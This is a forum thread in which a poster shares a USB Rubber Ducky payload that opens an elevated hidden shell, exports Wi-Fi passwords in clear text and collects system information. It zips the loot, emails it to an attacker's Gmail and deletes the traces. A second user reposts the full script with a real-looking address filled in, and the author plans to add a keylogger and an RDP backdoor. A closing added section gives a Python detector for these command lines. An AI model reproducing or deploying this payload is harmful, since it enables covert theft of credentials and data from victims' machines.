Zeta, posted April 7, 2015:

Hello fellow Hak5 fans!!! I recently have just written my first USB Rubber Ducky Payload and thought I would share it. If you spot any errors/improvements let me know.

```
REM Author: Zeta
REM Date: 4/5/15
REM Description: This program collects the computer info and wifi passwords of the victim and emails it to attackers gmail.
REM------------------------OPEN & HIDE------------------------
DELAY 750
GUI r
DELAY 400
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 555
ALT y
DELAY 555
ENTER
ENTER
ALT SPACE
STRING M
DOWNARROW
REPEAT 111
ENTER
REM ----------------------COLLECT & DUMP----------------------
STRING set TEMPDIR=%systemdrive%\de-temp
ENTER
STRING mkdir %TEMPDIR%
ENTER
STRING cd %TEMPDIR%
ENTER
STRING netsh wlan export profile key=clear
ENTER
STRING set > info.txt
ENTER
STRING cd..
ENTER
REM ---------------------------------------------ZIPPING FILE---------------------------------------------
DELAY 450
STRING echo Set objArgs = WScript.Arguments > _zipIt.vbs
ENTER
STRING echo InputFolder = objArgs(0) >> _zipIt.vbs
ENTER
STRING echo ZipFile = objArgs(1) >> _zipIt.vbs
ENTER
STRING echo CreateObject("Scripting.FileSystemObject").CreateTextFile(ZipFile, True).Write "PK" ^& Chr(5) ^& Chr(6) ^& String(18, vbNullChar) >> _zipIt.vbs
ENTER
STRING echo Set objShell = CreateObject("Shell.Application") >> _zipIt.vbs
ENTER
STRING echo Set source = objShell.NameSpace(InputFolder).Items >> _zipIt.vbs
ENTER
STRING echo objShell.NameSpace(ZipFile).CopyHere(source) >> _zipIt.vbs
ENTER
STRING echo wScript.Sleep 2000 >> _zipIt.vbs
ENTER
STRING CScript _zipIt.vbs %TEMPDIR% %systemdrive%\de-temp.zip
ENTER
DELAY 200
REM -----------------------------------EMAIL LOG VIA GMAIL-----------------------------------
STRING powershell -command $SMTPServer = 'smtp.gmail.com'; $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('USERNAME', 'PASSWORD'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'EMAIL'; $ReportEmail.To.Add('EMAIL'); $ReportEmail.Attachments.Add('%systemdrive%\de-temp.zip'); $ReportEmail.Subject = '%computername%'; $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 100
REM ---------------------DELETE AND END---------------------
STRING RD /S /Q "%systemdrive%\de-temp"
ENTER
STRING TYPE nul > %systemdrive%\de-temp.zip
ENTER
STRING DEL /Q %systemdrive%\de-temp.zip
ENTER
STRING TYPE nul > %systemdrive%\_zipIt.vbs
ENTER
STRING DEL /Q %systemdrive%\_zipIt.vbs
ENTER
STRING exit
ENTER
```

atomixgray, posted April 8, 2015:

Well done! I love this idea.

mw3demo, posted April 9, 2015:

Looks great! Will give it a test! Meanwhile, leverage off this idea with more attacks and keep that ducky quacking! :)

Zeta (author), posted April 9, 2015:

Thanks :)!!! I definitely will, I plan on adding a whole bunch of stuff. My goals:
#1. reconnaissance (this code plus maybe IP address info)
#2. download and implement keylogger
#3. Backdoor (probably enabling RDP since network access is already granted)

Bluediamond, posted June 24, 2015 (edited June 24, 2015 by Bluediamond):

Is this great looking Payload still working? I ran it and it gets hung on UA and then sending me an email. Reds out during writing. Here's what I have.

```
REM Author: Zeta
REM Date: 4/5/15
REM Description: This program collects the computer info and wifi passwords of the victim and emails it to attackers gmail.
REM------------------------OPEN & HIDE------------------------
DELAY 750
GUI r
DELAY 400
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 555
ALT y
DELAY 555
ENTER
ENTER
ALT SPACE
STRING M
DOWNARROW
REPEAT 111
ENTER
REM ----------------------COLLECT & DUMP----------------------
STRING set TEMPDIR=%systemdrive%\de-temp
ENTER
STRING mkdir %TEMPDIR%
ENTER
STRING cd %TEMPDIR%
ENTER
STRING netsh wlan export profile key=clear
ENTER
STRING set > info.txt
ENTER
STRING cd..
ENTER
REM ---------------------------------------------ZIPPING FILE---------------------------------------------
DELAY 450
STRING echo Set objArgs = WScript.Arguments > _zipIt.vbs
ENTER
STRING echo InputFolder = objArgs(0) >> _zipIt.vbs
ENTER
STRING echo ZipFile = objArgs(1) >> _zipIt.vbs
ENTER
STRING echo CreateObject("Scripting.FileSystemObject").CreateTextFile(ZipFile, True).Write "PK" ^& Chr(5) ^& Chr(6) ^& String(18, vbNullChar) >> _zipIt.vbs
ENTER
STRING echo Set objShell = CreateObject("Shell.Application") >> _zipIt.vbs
ENTER
STRING echo Set source = objShell.NameSpace(InputFolder).Items >> _zipIt.vbs
ENTER
STRING echo objShell.NameSpace(ZipFile).CopyHere(source) >> _zipIt.vbs
ENTER
STRING echo wScript.Sleep 2000 >> _zipIt.vbs
ENTER
STRING CScript _zipIt.vbs %TEMPDIR% %systemdrive%\de-temp.zip
ENTER
DELAY 200
REM -----------------------------------EMAIL LOG VIA GMAIL-----------------------------------
STRING powershell.exe -command $SMTPServer = 'smtp.gmail.com'; $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('ishineblue', 'PWHERE'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'ishineblue@gmail.com'; $ReportEmail.To.Add('ishineblue@gmail.com'); $ReportEmail.Attachments.Add('%systemdrive%\de-temp.zip'); $ReportEmail.Subject = '%computername%'; $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 100
REM ---------------------DELETE AND END---------------------
STRING RD /S /Q "%systemdrive%\de-temp"
ENTER
STRING TYPE nul > %systemdrive%\de-temp.zip
ENTER
STRING DEL /Q %systemdrive%\de-temp.zip
ENTER
STRING TYPE nul > %systemdrive%\_zipIt.vbs
ENTER
STRING DEL /Q %systemdrive%\_zipIt.vbs
ENTER
STRING exit
ENTER
```
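
For defenders, the commands typed by the payload in this thread each start a process whose command line can be matched. The following is an added example, not part of the original thread or any poster's code: a small Python detector run over constructed process-creation records (the field names `host`, `ts`, `cmdline`, the host names and the five-minute window are assumptions) that alerts when a clear-text Wi-Fi key export is followed shortly by an SMTP send with an attachment from PowerShell.

```python
import re
from datetime import datetime, timedelta

# Indicators taken from the command lines in the payload posted in this thread.
RULES = {
    "wifi_key_export": re.compile(r"netsh(\.exe)?\s+wlan\s+export\s+profile\b.*key\s*=\s*clear", re.I),
    "elevated_cmd_via_powershell": re.compile(r"powershell(\.exe)?\s.*Start-Process\s+cmd\b.*-Verb\s+runAs", re.I),
    "vbs_zip_helper": re.compile(r"cscript(\.exe)?\s+\S*\.vbs\b", re.I),
    "smtp_with_attachment": re.compile(r"powershell(\.exe)?\s.*Net\.Mail\.SmtpClient.*Attachments\.Add", re.I),
}
WINDOW = timedelta(minutes=5)  # assumption: injected keystrokes finish quickly

def match_rules(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def detect(events, window=WINDOW):
    """Alert per host when a key export is followed by an SMTP send within `window`."""
    hits = {}
    for ev in events:
        ts = datetime.fromisoformat(ev["ts"])
        for name in match_rules(ev["cmdline"]):
            hits.setdefault(ev["host"], []).append((ts, name))
    alerts = {}
    for host, seen in hits.items():
        exports = [t for t, n in seen if n == "wifi_key_export"]
        sends = [t for t, n in seen if n == "smtp_with_attachment"]
        if any(timedelta(0) <= s - e <= window for e in exports for s in sends):
            alerts[host] = sorted({n for _, n in seen})
    return alerts

# Constructed sample records (not real telemetry); field names are assumptions.
SAMPLE = [
    {"host": "WS-01", "ts": "2015-06-24T10:00:01", "cmdline": "powershell Start-Process cmd -Verb runAs"},
    {"host": "WS-01", "ts": "2015-06-24T10:00:09", "cmdline": "netsh wlan export profile key=clear"},
    {"host": "WS-01", "ts": "2015-06-24T10:00:12", "cmdline": r"CScript _zipIt.vbs C:\de-temp C:\de-temp.zip"},
    {"host": "WS-01", "ts": "2015-06-24T10:00:15", "cmdline": "powershell -command $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587); $ReportEmail.Attachments.Add('C:\\de-temp.zip'); $SMTPInfo.Send($ReportEmail)"},
    {"host": "WS-02", "ts": "2015-06-24T11:00:00", "cmdline": "netsh wlan show profiles"},
    {"host": "WS-03", "ts": "2015-06-24T12:00:00", "cmdline": "netsh wlan export profile key=clear folder=D:\\backup"},
]

if __name__ == "__main__":
    for host, rules in detect(SAMPLE).items():
        print(host, rules)
```

A lone key export (the constructed WS-03 record) matches a rule but does not alert, since an administrator backing up profiles produces the same command line; the correlation with the mail send is what separates the two.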